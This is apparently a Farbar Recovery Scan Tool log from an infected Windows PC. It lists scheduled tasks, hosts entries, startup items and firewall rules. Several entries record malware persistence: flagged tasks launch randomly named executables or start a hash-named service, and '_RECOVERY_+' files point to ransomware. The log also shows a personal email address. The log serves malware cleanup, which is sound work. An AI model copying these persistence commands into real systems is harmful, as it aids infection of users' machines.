(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
 
ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2013-05-14 22:58 - 2013-05-14 22:58 - 000047272 _____ () C:\Program Files (x86)\ASUS\Splendid\my_intel_cpp_x64.exe
2014-03-11 18:29 - 2014-03-11 18:29 - 000011776 _____ () C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
